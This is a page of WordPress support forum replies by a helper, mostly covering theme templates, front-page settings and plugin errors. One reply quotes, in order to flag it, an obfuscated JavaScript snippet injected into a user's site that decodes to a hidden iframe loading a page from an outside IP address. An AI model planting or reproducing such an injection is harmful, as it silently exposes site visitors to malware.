Len
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: I want timestamps, but only on postsMy theme only had one template for all posts and pages. What I did was duplicate the index file, and when I renamed it to “page.php”, wordpress recognized that it would be the template for pages, and not posts.
That’s exactly what I said. 🙂 Glad you got it going. However, you have a much larger problem than template files right now. Getting back to the malware thing, browsing to your site in Safari this is the warning one gets. Clicking on the link takes you to the Google Diagnostic Page.
You may want to peruse the various threads below as they contain some good info.
Forum: Fixing WordPress
In reply to: I want timestamps, but only on posts@ mike868y,
Thanks for that info. Now that you mention it I took another look.
@ swollenthumb
In the source code at the bottom of the page I see this …
<script type="text/javascript"> <!-- var s="=jgsbnf!tsd>(iuuq;0078/326/342/3530vt0joefy/qiq(!xjeui>(2(!ifjhiu>(2(!tuzmf>(wjtjcjmjuz;!ijeefo<(?=0jgsbnf?"; m=""; for (i=0; i<s.length; i++) m+=String.fromCharCode(s.charCodeAt(i)-1); document.write(m); //--> </script>I’m assuming you didn’t put that there.
Forum: Themes and Templates
In reply to: Stat counter or Google Analitics on theme pages questionThis theme’s footer has just a small paragraph about 5 lines of letters and numbers and that’s it.
I don’t like the sounds of that. Would you mind letting us know the contents of footer.php?
Forum: Fixing WordPress
In reply to: I want timestamps, but only on postsInteresting theme. It uses one template file to display home, single, categories, archives and pages. Make a complete duplicate of index.php call it page.php and upload it to your theme’s folder. That new file – page.php – will now be the one used to display pages. Open that file (page.php) and look for this line …
<div class="meta"><?php _e("Posted by"); ?> <?php the_author() ?> | <?php the_category(',') ?> | <?php the_time('l j F Y'); ?> <?php the_time() ?> <?php edit_post_link(__('Edit This')); ?></div>Edit out what you don’t want. Assuming you don’t want any of it then it should look like this …
<div class="meta"><?php edit_post_link(__('Edit This')); ?></div>Notice I left the “edit this” link in place. It will only be visible to you when logged in and allows you quick editing access to it.
Next, from that same file remove this …
<?php comments_popup_link(__('Comments (0)'), __('Comments (1)'), __('Comments (%)')); ?>… and this …
<?php comments_template(); // Get wp-comments.php template ?>Make sure to make a backup before doing any of this.
Forum: Installing WordPress
In reply to: Cannot Access to DashboardWhen I click ‘here’ I noticed your Warning …
That’s not my site. 🙂 It belongs to Podz (Mark). If you’re unsure how to proceed just post back here.
Forum: Fixing WordPress
In reply to: Complete novice I cannot view my siteHi ourgrand,
When you said this …
The website is ourgranddayout.com
I assumed you installed WordPress at root. Upon further investigation I see that you actually installed it in a subdirectory.
Forum: Fixing WordPress
In reply to: Complete novice I cannot view my siteWhere will I find the index.html file?
It will be at root. I haven’t used cPanel in ages but you should be able to find it using its file manager.
Forum: Fixing WordPress
In reply to: Blogroll changed after upgrade, can’t editWhen using widgets the Links widget will display whatever links you have configured at Links > Link Categories
You can delete those current links at Links > Edit
Add new links at Links > Add New – where you will also have the option of creating new Link Categories
Forum: Installing WordPress
In reply to: Cannot Access to DashboardYou need to go into your database and change the values back to what they were. Easy instructions on how to do that here.
In the future, if you want to set a different page to be the “landing page” navigate to Settings > Reading where you will see “Front page displays” with 2 options:
1. Your latest posts
2. A static page – with a drop down menu to select the one you wantForum: Installing WordPress
In reply to: Restore WP?That’s why I don’t like using scripts do to installs or upgrades. It’s best to do them the old fashioned way.
Try uploading a fresh copy of this file –> wp-includes/functions.php
Actually, odds are if that file didn’t make it others may not have as well.
Forum: Fixing WordPress
In reply to: Complete novice I cannot view my siteIt looks as if you have your host’s default index.html file in root. Just delete it.
Forum: Fixing WordPress
In reply to: category post not to show up at front page?If you want to exclude posts from a certain category from appearing on your front page first determine which page template is used to display your front page – some themes use index.php while others use home.php
Once you have figured that out you can use the
query_postsfunction. Insert this at the top of the template file used to display your front page …<?php if (is_home()) { query_posts("cat=-X"); } ?>… where X is the numerical ID of the category you want to exclude.
More reading on query_posts.
Forum: Themes and Templates
In reply to: Where is the “two columns”, “three columns” listing for themes?We get that question a lot. 🙂 Don’t know why that link is not posted where it can be seen.
Forum: Fixing WordPress
In reply to: fatal errorAccording to the error message you have the pagenavi plugin installed. It must also be built into that theme’s function.php file because it is trying to declare it there as well hence the error. Deactivate the plugin.
Forum: Themes and Templates
In reply to: Where is the “two columns”, “three columns” listing for themes?